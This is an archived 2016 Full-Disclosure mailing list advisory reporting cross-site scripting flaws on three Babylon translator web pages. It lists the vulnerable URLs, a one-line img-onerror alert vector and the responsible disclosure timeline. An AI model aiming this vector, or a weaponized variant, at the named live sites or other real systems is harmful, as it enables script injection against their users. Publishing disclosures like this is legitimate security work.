lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Thu, 2 Jun 2016 12:03:51 +0200
From: Francisco Javier Santiago Vázquez
 <franciscojaviersantiagovazquez@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Multiple XSS in Babylon

I. VULNERABILITY
-------------------------
Vulnerability Cross-Site Scripting (XSS)



II. PROOF OF CONCEPT
-------------------------*URL: *

   1. http://espanol.babylon-software.com/bht/index.html?trid=
   2. http://traductor.babylon-software.com/ingles/a-espanol/
   3. http://traduccion.babylon-software.com/?trid=

*Vector:* <img src=1 onerror=alert("n0ipr0cs");>/

*State:* unpathed



III. SYSTEMS AFFECTED
-------------------------
The vulnerability affects the Translator and web Babylon.



IV. ABOUT BABYLON

-------------------------

Babylon was founded in 1997 and is headquartered in Tel Aviv (Israel).
Babylon offers different and various services to end users and
businesses.

The translator offers translations in 77 languages, English is also
available. The software is sold worldwide and is used in more than 168
countries and has a growing base of users of desktop installations
more than 90 million. In addition it has app for Iphone, Android,
Windows, Blackberry and Kindle and even a pro for business service.

On the other hand, there is monetization services for providers of
contents and web publishers web sites, bloggers and webmasters.

This company even has search services on the web, yes also is a search engine.




V. CREDITS
-------------------------
These vulnerabilities have been discovered by
Francisco Javier Santiago Vázquez  aka "n0ipr0cs"
(https://es.linkedin.com/in/francisco-javier-santiago-v%C3%A1zquez-1b654050).
(https://twitter.com/n0ipr0cs).



VI. DISCLOSURE TIMELINE
-------------------------
April 03, 2016: Vulnerability acquired by Francisco Javier Santiago
Vázquez. aka "n0ipr0cs".
April  03, 2016 Responsible disclosure to Babylon Security Team.
April  04, 2016 Responsible disclosure to Babylon Security Team.
May  18, 2016 Responsible disclosure to Babylon Security Team.

June 02, 2016 Disclosure.



VII. Links
------------------------
POC: http://www.estacion-informatica.com/2016/06/xss-en-babylon.html







*Francisco Javier Santiago Vázquez Ethical Hacker and Forensic Analyst
<http://www.linkedin.com/pub/francisco-javier-santiago-v%C3%A1zquez/50/540/1b6>
<http://estacioninformatica.blogspot.com.es/>
<https://twitter.com/n0ipr0cs>*

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ